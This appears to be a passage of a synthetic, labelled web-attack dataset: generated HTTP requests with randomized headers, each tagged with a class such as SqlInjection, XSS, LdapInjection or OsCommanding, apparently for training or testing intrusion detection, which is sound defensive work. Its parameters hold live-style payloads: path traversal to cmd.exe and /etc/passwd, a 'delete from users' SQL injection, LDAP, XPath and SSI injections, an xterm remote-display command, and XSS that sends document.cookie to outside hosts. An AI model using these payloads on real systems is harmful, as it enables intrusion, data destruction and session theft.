Via: 9.5 111.240.168.249, 8.1 www.uerl2uoo.htm:23
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 137 173.7.112.18 "mIt3it3cidet" "Sun, 16 Sep 07 01:52:40 GMT"
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41700
Start - Id: 43766
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 163.243.63.234
Connection: kwcAlv
Accept: */*
Accept-Charset: windows-1251, iso-8859-1;q=0.9, euc-kr, x-mac-hebrew;q=0.0
Accept-Encoding: compress, compress, deflate;q=0.8, deflate, compress
Accept-Language: ed-ndgn, nkyp-onfod, lkj-stas, lslw-yaB;q=0.4, nteLn-7rallA;q=0.9
Cache-Control: ao='p8'
Client-ip: 242.53.53.65
Cookie: vAooiI=jTu6o;tzzictTnaE8tlaf=nYWA;vfilspe5soar=eeaenippipa2itezl
Cookie2: $Version="1"
Date: Tue, 15 Sep 09 13:44:42 GMT
ETag: W/"v8oIFfpbb9jaiyr"
Expect: wspr4ebT
From: merccs0n@HaIq3eH9x.gov
If-Modified-Since: Fri, 22 May 09 10:51:47 CET
If-Unmodified-Since: Tue, 07 Oct 08 19:59:30 UTC
If-Match: "Ja0D2jKowACW9diY2"
If-None-Match: "EGU7l-Ye4iMV_T0X-"
If-Range: Mon, 05 Oct 09 16:23:11 CET
Max-Forwards: 33
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Basic ZGhyb0Flb2g6ZWVobGExcw==
Range: 10571-03
Referer: http://www.plsm.ch/ht6EOa.htm
TE: deflate,deflate,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 8.0; ln-nn; rv:4.3.7) Gecko/00998528
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: HTTP/9.9 www.oxuqsnf.css, 1.0 193.202.64.234, HTTP/4.2 215.58.113.179:3
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 725 239.192.69.199 "oo5kiaaie" "Thu, 23 Jun 05 19:03:49 CET"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43766
Start - Id: 45065
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.woea.be
Connection: nyaicNy
Accept: */*
Accept-Charset: iso-8859-3, windows-1258;q=0.9, x-mac-ce;q=0.2, iso-8859-6, iso-8859-4;q=0.4
Accept-Encoding: 
Accept-Language: saZt-n3e, oiuih3k-neagmltr;q=0.1, ansD1yT-as;q=0.3, 9TsiaAe-DhiU;q=0.0
Cache-Control: only-if-cached
Client-ip: 4.109.212.12
Cookie: irnh6Oeks=rnmXdh;YRq@=Gvart-H;traas=pjteoaeia;nTitiEmin=s3hvngbsprnwi;catfr=pal7hIfrJja;tggimgT2whereDhtpassS4U=rr
Cookie2: $Version="628"
Date: Sun, 20 Apr 08 22:54:55 CET
ETag: W/"VI05iHgMeDWsSIG"
Expect: z4wo
From: a5eiztho@ausccrtksa.uk
If-Modified-Since: Mon, 07 Jan 08 24:25:13 CET
If-Unmodified-Since: Fri, 30 Jan 04 16:37:50 CET
If-Match: *
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: *
Max-Forwards: 4
Pragma: no-cache
Proxy-Authorization: lerhb ixmcve=esfi
Authorization: wwm4 lhte=39nrsuh
Range: 373-850
Referer: /ebesxans/sprg1een.exe
TE: trailers
Trailer: Host
User-Agent: pFBw0TB http://www.nssree.st
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45065
Start - Id: 46226
class: PathTransversal
GET /tYQIRiFwjz5NOR08/Meikc1ksuaidcimeib/f2@fYpuUQRsZ.cfm?erEk=94088&srezEytE=eval%24o&nael8=itl%24synree8x%3DdDd&sqsnxataiup=3etlk++Ordgnullo%40s&horidqytawp=0du1p1n5e&saate=5%3BrtcssystemUb%25&wsrkx=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&ow0onv0eUhe=pvat6rouah&DmlikeE5wLs0=mt6t+f HTTP/1.1
Host: 91.254.229.36
Connection: ondq5eek
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 184.19.40.250
Cookie: urotbmx=th~st;d3NHQ=5302077574;P5vjL=dnsyeaodd8=
Cookie2: $Version="374"
Date: Mon, 20 Jun 05 09:54:09 UTC
ETag: W/"T3S71sqPNBzZRCk"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Wed, 11 Mar 09 14:10:43 UTC
If-Unmodified-Since: Sun, 06 May 07 01:41:23 CET
If-Match: "s940TZe3N@IJ_w5ErVj"
If-None-Match: *
If-Range: Mon, 11 Jun 07 03:33:11 UTC
Max-Forwards: 733
MIME-Version: 1.9
Pragma: tinn2l=e
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic b2VpbzpIcGhyZQ==
Range: 3-320
Referer: /ci1h/8ewos8/tatwpeay.dll
TE: trailers,deflate;q=0.0,deflate
Trailer: Accept-Language
User-Agent: eniezn/1.2
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: usorpa
Upgrade: Rorl/3.3, 6hT9/1.0, r7sS/3.9, ete/1.9
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46226
Start - Id: 42437
class: SqlInjection
GET /rKlWMZUoxOjKOWtNC5f/locationx3O5ybL/a@hM3zi/45erfcnnrqrsbqilbMd3.bin?ne=mtoe&dnutyqc=hntpl0athBkbeIlnt&rlacooleeqnuf=79210875&hlit5retm=oajaie&vos=710&U8_omRPBS1ky=n_mF43DPU30R&Su9dtiplpd0=7136422&kKaLn2NVdV9R=sftmpgaiSeSe&3kli=stdin&VzSo@KF=ntroaephpeisei&ns=trcdDs&aCettn7jredoqe=%27++++%29%3B+delete++from++users%3B++++commit%3B++dummy%28%27 HTTP/1.1
Host: 162.158.65.100
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, deflate, compress;q=0.0, deflate, deflate
Accept-Language: cbma-oaoEfs
Cache-Control: no-transform
Client-ip: 240.161.64.35
Cookie: .ghtaccesloK=024687350
Cookie2: $Version="2"
Date: Wed, 16 May 07 11:15:54 UTC
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Sat, 22 Dec 07 09:03:45 UTC
If-Unmodified-Since: Thu, 30 Jun 05 09:11:11 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Oct 06 12:44:22 UTC
Max-Forwards: 2
MIME-Version: 0.6
Pragma: leomi='oihlabna'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: 53-,-2932
Referer: /qemor2et/3eTwm9a/t1veso/eaaseh.jpg
TE: deflate;q=0.8
Trailer: From
User-Agent: cxakst http://www.oIegnfho.it
UA-CPU: PowerPC
UA-Disp: 257,8628,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 5.1 www.foetac.png, HTTP/6.6 109.95.108.194:0308
Transfer-Encoding: deflate
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42437
Start - Id: 37795
class: LdapInjection
GET /edCkySt-/he.dMvxD9zT.mspx?beqqeAoaUeLxen=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&wrAnteHflaxiT=tgilEiy9eitee7o7gt&thooBbl=113635&ovoaaqefN=mctsl8Ttbd&eahwocrsbetns=93&ohikRnraob0dwnt=a-hxKluVwl&fH5NtGtLVVs=76391&ehHndteieEuyase=sHtwo7&noHroOeetii=shoaah&eeuslnrrlesri6=ncaa%2F&zTasnksis6=cetoetr HTTP/1.1
Host: www.aEpawtbnt.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eingortg-1t3o, scchtd7n-gta1Epin;q=0.0, a-yr, ii-xvjtcm4;q=0.9
Cache-Control: l0=ftlo
Client-ip: 88.4.33.9
Cookie: aeoea9s=noaM;hr=yGU;FOOQfrom.Z_8=hetihahn
Cookie2: $Version="375"
Date: Mon, 21 Sep 09 09:58:17 GMT
ETag: W/"v4Jd_fMeChEj0Ulgn"
Expect: h2tit=i1adelef
From: uh7w@ednaarot.de
If-Modified-Since: Mon, 29 Dec 08 24:38:32 GMT
If-Unmodified-Since: Thu, 01 Jan 09 19:51:17 UTC
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: "sDHMbGRcQ.TLhLogSSNl"
If-Range: Tue, 29 Dec 09 11:28:05 CET
Max-Forwards: 1198
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Basic N05lYUZhOmlkVGxs
Range: 33-,197469-1
Referer: /doxEd.wmn
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 8.5; in-hu; rv:1.0.5) Gecko/56497824
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 9.5 12.189.233.108:313
Transfer-Encoding: gzip
Upgrade: et7h/0.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37795
Start - Id: 38503
class: LdapInjection
GET /ktoom6snvunfzeAsjets/rwqhANCLkxWpPTUQ9/QHunionxe7HPhxm5/uH4QjASpCmSY/ansp7j.asmx?meo=nlT9n&zd2ti=am.EDf2WtK&insdwihldrtet=797690&oeeiemChlio=tgom&i3odcome=ntr%40dihjzm&nHaicutemlo=f.RwvUHo_mg7&titaoots4ni=+etoE%7Cfhaegnoviddgf&farjmstl=ttRnhoeONnrehdt&.D.6fupdate=s&lwc=9825&gt=570&oaggb1nrfe=tay&hevalSedeOsu=682285&o7lri=%29++%28++++%7C++%28++++cn%3D*o++%27brien*%29%28mail++%3D*o++%27brien*%29+++&OvFIdivJ0http=ilVQI HTTP/1.0
Host: 245.135.191.180
Connection: keep-alive
Accept: audio/*;q=0.0
Accept-Charset: windows-1251, iso-8859-8;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: ao-acthCyvx
Cache-Control: no-cache
Client-ip: 150.1.113.3
Cookie: yg8tT6h=65;_8RnH=eftas<cSopensehrsetc;3toh=rgEyx2;weerccTgsan568t=tstaee0ettt8iit;snH7h=@g|madmiouit8 shutdownr2;-q9B3=8P3y=a\vpositionagroup byohAr]all@5
Cookie2: $Version="33"
Date: Mon, 08 Oct 07 10:46:35 GMT
ETag: "zquZ.85zU@b08iEVA7ZH"
Expect: 100-continue
From: eorT@elrAedmeoy.biz
If-Modified-Since: Mon, 17 Dec 07 05:10:16 UTC
If-Unmodified-Since: Tue, 31 Jul 07 16:58:38 CET
If-Match: *
If-None-Match: "NFfENmEb00JDlZZI-cj"
If-Range: Fri, 13 Aug 04 02:50:40 UTC
Max-Forwards: 811
MIME-Version: 3.3
Pragma: baaicke=hknheoru
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Digest nc=7f6aaCd6
Range: -087,245-62681,-648438
Referer: http://esmu.gov/7hOrMN1a/sh7syz/shsieDu/scTtne.asp
TE: deflate,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.2 (X11; U; Open BSD i386 3.9; 7o-ht; rv:8.2.5) Gecko/23854949
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: 1.0 www.5enoeeb.html:767, HTTP/9.3 www.tnusg.gif, FTP/4.3 110.99.5.122
Transfer-Encoding: ol5je; uoops=akmmec
Upgrade: na0eT/4.7, vutbvf/7.1
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38503
Start - Id: 40658
class: SSI
GET /nHT-_l9edRM/9MuDKdKe/eKMEEvRbC6A9I0N-AOS.pl?.h1oPsqN=taiqklnE1i+tb&n0ytn2tnie=302913203&uctkrfoeGismli=%3C%21--++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.1
Host: www.tikd.net:80
Connection: prsag
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: icat-gt0pon, s8Lro-mesEhc, e3cp5tDm-shu79rs, hvnmT-td4;q=0.7, mn-nnofath
Cache-Control: e9e9en9='tenkr'
Client-ip: 106.153.133.183
Cookie: Sprtqadrm0otEs=iwi;o9l4sd6oItT0u=ozUnVN.M98x;swset=955
Cookie2: $Version="6"
Date: Wed, 02 Jul 08 07:34:49 CET
ETag: "Wx2dKH1wi9MYU.2"
Expect: 100-continue
From: mstnlt@azrx6.biz
If-Modified-Since: Tue, 10 Aug 04 02:38:44 UTC
If-Unmodified-Since: Tue, 20 Jul 04 18:27:15 CET
If-Match: *
If-None-Match: "mbUBdyiFLE8akywo.bs"
If-Range: "KRQC289Z68WgMkPD2"
Max-Forwards: 6187
Pragma: sl=nG
Authorization: Basic YWFkbG5oTVE6dHRBMmVtcg==
Referer: http://aadhe.it/toep.pdf
TE: deflate;q=0.7,trailers,trailers
Trailer: From
User-Agent: ePQ2i2oS1 http://www.okyiN.net
UA-Disp: 574,0063,16
UA-Color: color32
Via: 0.8 116.106.182.104
Transfer-Encoding: olnood
Upgrade: o5x/8.1, nocyr/9.6, efmda/6.0
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40658
Start - Id: 35467
class: XPathInjection
GET /d6DsEi5lw/tiR7ijM/sAkK9KRvMm0kogpS/nvXsJnf/ht2heisui3ehoQsesi/igcrovbb8Cwnciudelr/utbePB4/ls/Wnir3ote9aaaumasadp/sswedcOET9ueiateyss/aIHP89Km.h_/dj.tiff? HTTP/1.0
Host: www.rictuh.biz:48222
Connection: close
Accept: video/mpeg, image/png, application/*
Accept-Charset: *
Accept-Encoding: 93251   or  nte/b92o/eoarw/child::node()[position()=4]   or 637=
Accept-Language: ttnxerl-fk;q=0.7, a-l, lft5bu2s-onsree;q=0.1, twn-bnetEA;q=0.3
Cache-Control: only-if-cached
Cookie: ttiia=n6t 1asi
Date: Sat, 28 Nov 09 08:07:26 CET
ETag: "dFInZO7AAV.iTnAMyce"
From: jvieot@oenh1.fr
If-Unmodified-Since: Fri, 12 Mar 04 21:46:29 UTC
If-Match: "j03rP.H7l6923-lhKSR2"
Max-Forwards: 02
Referer: /tu7eaeth/efeeho.php
TE: trailers,trailers,trailers
User-Agent: Mozilla/5.3 (compatible; Konqueror/9.7; Windows NT; c6tfz; aqsdur)
UA-CPU: StrongARM
Transfer-Encoding: identity

null

End - Id: 35467
Start - Id: 47812
class: XSS
GET /2vmVhIoVBC0XB@1/h56zmocha@I/oImu00z6Tw0oIF4Z.rdk/oe87hceaosntYhc/XcnpIClbpldinreani/eiseufeo/shx/nz@l0XD.pRjx27VkngSQ/betweensjnull/vjlq/atwitriTb3g.mspx?raEiutiqew=%3Cimg++src++++%3D%22eldeisnean+++%3E+++++%22++++onmouseover+++%3D+%22+++++%5Bwindow.open%28%27http%3A%2F%2F149.30.198.16%2Fasanas.sh%27%2Bdocument.cookie%29%3B%5D+%22+%3E&6DtJEbqscriptPp=3876&1ahabKahsexwu=bZMnGrrZX8&Eeehoewnsi=ds7EpaEgu&cmGSxTU=%3CrDsg HTTP/1.0
Host: www.hocZH.com:80
Connection: keep-alive
Accept: text/html;q=0.7, text/*;q=0.4, audio/basic;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.4, deflate;q=0.2
Accept-Language: vll1hdnl-aeot2;q=0.4
Cache-Control: min-fresh=078
Client-ip: 203.124.10.83
Cookie: reJ1nuepm=87388;MQ6RE1f=oig;05Z765.oFAhavingE=anETnpNscdH;XGY7Xv-httpunionF= htpass5c]ls-8tqeohr;ro1b8Wktmbqf=wo
Cookie2: $Version="5"
Date: Thu, 17 Feb 05 07:46:28 UTC
ETag: "cb8w5hhmsZL2xLnl0P0C"
Expect: WguInnoe
From: shnba@roottg.it
If-Modified-Since: Fri, 21 Dec 07 16:17:34 CET
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "mXTKK6G1B_WP-tlrg"
If-Range: Wed, 18 Apr 07 14:05:50 UTC
Max-Forwards: 6
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Digest nonce
Range: 2820-37,-5180,81-
Referer: /rifov/zAoetnm/1or99jn/ghaulfr.php
TE: trailers,chunked,gzip;q=0.5
Trailer: Expect
User-Agent: reraeto4 (n2oUWXj8)
UA-CPU: x86
UA-Disp: 8203,202,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 628x152
Via: FTP/8.4 49.217.155.124
Transfer-Encoding: gzip
Upgrade: sejn/3.6
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 3578950
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47812
Start - Id: 47120
class: XSS
GET /hHaXHObBFaDWV/mCoGfMNWrat0Ck/9i9qOTmA/i5hpYsBcIGT@pkJqckhS/itnllSmanisOeendmf/Vdhan2ileaewcel/q6S1gtRUU.__@L../ivOO@YqzNgMlB591P.html?msnoi4mfr=hNgk&_ZxbSsQ=%3Ciframe+++++src++++%3D+++%22+++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F130.77.161.78%2Flitr.msf%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&@i_J@ha5=fromisEaUo HTTP/1.1
Host: 54.170.85.155
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: min-fresh=83735
Client-ip: 111.27.185.154
Cookie: hd=2093
Cookie2: $Version="3"
Date: Mon, 08 Jan 07 07:17:42 GMT
ETag: "mQNu2WqrXNJIUGh7"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Mon, 05 May 08 16:20:41 UTC
If-Unmodified-Since: Sun, 21 May 06 20:33:50 UTC
If-Match: *
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 298
MIME-Version: 5.8
Pragma: ghnp2d='dau'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cnNzZ2Vhc3RxbnNlN3JwVWZ2YTl3bm50dHNjY3BzZXJud2U1MHh0bQ==
Range: 38-13,-4
Referer: /rbia/ltdnezz.tiff
TE: deflate
Trailer: Via
User-Agent: qtpltfdoceohthcAsh
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/3.3 www.ggoa.css, 7.8 www.c5erhzje.gif
Transfer-Encoding: compress
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47120
Start - Id: 46932
class: XSS
POST /ni0h/esiunu/W@orHNzvbscriptu0Sp/wmjLY/acn.htm? HTTP/1.0
Content-Length: 270
Content-Language: nh,rdmUds,2
Content-Encoding: deflate
Content-Location: http://www.oduot.uk/Oico2/seclo.htm
Content-MD5: VDVzc2V0cmV2b2Rhc2FtYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Sep 05 19:56:22 UTC
Last-Modified: Mon, 21 Jul 08 20:59:21 CET
Host: 41.131.72.251:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.4, deflate;q=0.7, gzip;q=0.8
Accept-Language: *
Cache-Control: Etez='w'
Client-ip: 76.30.12.210
Cookie: jloypaone=r 
Cookie2: $Version="688"
Date: Sat, 18 Oct 08 16:50:05 CET
ETag: W/"@EO1@@IWjcaKk@I8WI82"
Expect: Loer=fteWoeui
From: eiatt@esmwa8oeu.gov
If-Modified-Since: Fri, 11 Jun 04 16:21:33 UTC
If-Unmodified-Since: Mon, 19 Feb 07 17:04:20 GMT
If-Match: *
If-None-Match: "D8mRwUwzvvgq1MsqtQ"
If-Range: *
Max-Forwards: 695
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: Digest qop=v1tssr
Range: 455810-240,-24385
Referer: http://www.daBV.uk/eofidtt/richlelc/hite.swf
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/7.6 (X11; U; Unix 9.4; dh-57; rv:5.4.2) Gecko/56234440
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 133 128.21.84.17 "ewraoseeFm" "Fri, 27 Feb 04 19:29:24 CET"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

niAeuiywop54Nt=td&oseeNdeaweWofae= hhth7JheL s4&nbou=Tii&seoGimos6zeefi=rtmaLnle3m&2rT0Xh=<img    src    =  "   livescript:[window.open('http://0.167.196.236/etlent.php3'+document.cookie);]  "  >&s0nP1s=1&inLt9efDtaRert=npi+eeo5neoI

End - Id: 46932
Start - Id: 44424
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.rrBhe.biz
Connection: keep-alive
Accept: image/*;q=0.3, text/xml
Accept-Charset: koi8;q=0.6, us-ascii;q=0.4, x-mac-ce;q=0.6, iso-10646-ucs-2;q=0.4, iso-8859-1;q=0.8
Accept-Encoding: deflate
Accept-Language: imr-A, sAEittw-Mo3stt;q=0.1
Cache-Control: max-stale
Client-ip: 82.62.123.205
Cookie: eoadr=4847
Cookie2: $Version="352"
Date: Wed, 11 Jun 08 17:24:25 CET
ETag: W/"pH3z7Lb_BNHVotjveEcj"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sat, 28 Jul 07 17:07:26 CET
If-Unmodified-Since: Mon, 29 Dec 08 06:09:27 GMT
If-Match: "hQOO.YwZs1b3wzs_H"
If-None-Match: *
If-Range: *
Max-Forwards: 6848
MIME-Version: 6.2
Pragma: o=brtsHn
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Digest nonce
Range: 6-02287,72753-
Referer: http://www.sae9etxh.net/atwf/yihum/0uldasWn.js
TE: deflate,gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 9.3; lp-td; rv:2.2.5) Gecko/83985512
UA-CPU: Sparc
UA-Disp: 015,480,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6396x837
Via: 8.6 248.170.100.124:6
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 850961396
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44424
Start - Id: 38175
class: LdapInjection
GET /inedisy/emsni/9QByRLqzhzO6QfLIbY./bY/r7iTej4VatcAhocau1om/i.caEqMt9SK5y-b/r7Lp0Xl/dFMkfupdateixinputnetcatZB/chc/ec7oWexGddiv/bjwHoza3.jpg?nhacpgtactavP=lgtSrpsdt%5Df+77foftpq&@rJYMaS=ts%3ChetF&EIoou=a+m6&9miframeEQHuC=lRs%27&7iedehlmelraga=6&alBnne=erRgma&8e6enginByIcoan=iia4hri%3C+a&tQzrtnCitseterw=%29%28++%7C++++%28zrebx%3Dne*%29&xtrw=93&srrteobei=aLZmK3&jRH1Nrm=3057043675&N9mTaotedisdtmn=4&tnro1S1t61oidc=eIuXQR%40ZtDIU HTTP/1.1
Host: 98.7.158.86
Connection: npst
Accept: image/*, image/png;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: oow7Eer-zhb;q=0.6, rmleh-rre;q=0.4, 7eMis7-1gysgF;q=0.0, oodn-ttbEiag;q=0.4
Cache-Control: max-age=4247
Client-ip: 122.186.185.249
Cookie: qelrdleuEfohhes=e4iaeahje9;sseettxoijteio=101992507;TOE6wUd=hk0%passwdm6f6awtnul
Cookie2: $Version="370"
Date: Fri, 15 Oct 04 23:44:20 CET
ETag: W/"cvMbx4sfux4.USQJj"
Expect: Lsssd
From: haUng3@sobstrhR.com
If-Modified-Since: Thu, 22 Jan 04 13:26:09 CET
If-Unmodified-Since: Fri, 14 Sep 07 18:03:39 CET
If-Match: "tTs@xBNSz4dL-UT_3"
If-None-Match: *
If-Range: Mon, 28 Mar 05 14:38:31 GMT
Max-Forwards: 0839
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWFjdGNpcHQ3ZGM5U2hjc2Vzc24xdEllRWN0c3VramVIdA==
Authorization: Basic dHNzMmRxZzpuZHJyZWw=
Range: -58269,-622
Referer: /d0oi4oe/9eemap/2enhsvsa/vErUotO/1a4w.php3
TE: gzip,trailers,deflate
Trailer: Via
User-Agent: nmcr3nainsseoelHy
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 431x6925
Via: 3.2 www.aRput.tiff
Transfer-Encoding: identity
Upgrade: nume/0.6, Uma/7.3
Warning: 714 196.134.47.248 "mvqoncbecrdtrzc" "Wed, 27 Jul 05 23:32:10 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38175
Start - Id: 43515
class: OsCommanding
GET /oddtoNrsnynyfos/gillocr1esrdbnhqsf/euS23LOIvdHh/otrtnito/qY-14k.-6deGX2pB2/tgcemkt6e1tu.htm?xtadahttwTe=teleEntepo&ui4hEiisrl6=9%40y9KyX&6e4ohpd=%5Cr+xterm+++-display++20.152.25.116%3A0.0 HTTP/1.1
Host: www.smeMW.cz
Connection: keep-alive
Accept: audio/basic;q=0.1, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=137
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="613"
Date: Sun, 28 Sep 08 14:45:36 UTC
ETag: "PxnNJB_jtB5FqDUJ"
Expect: 100-continue
From: tfmhsdrp@fM13.gov
If-Modified-Since: Thu, 09 Aug 07 14:08:39 CET
If-Unmodified-Since: Fri, 09 Nov 07 01:27:22 UTC
If-Match: *
If-None-Match: "cID5GLTs_skJKM_5"
If-Range: Tue, 01 Jun 04 19:50:49 UTC
Max-Forwards: 1111
MIME-Version: 5.5
Pragma: lr=tiat
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bnhuYXNlZU41ZWJEZGN2TGxjdHB0b2tzNWNmU29zVGZvb2k5Q3M1N084ZQ==
Range: 41-,-475,4948-
Referer: http://haeeh.cz/senbsn.jpg
TE: trailers,trailers,chunked
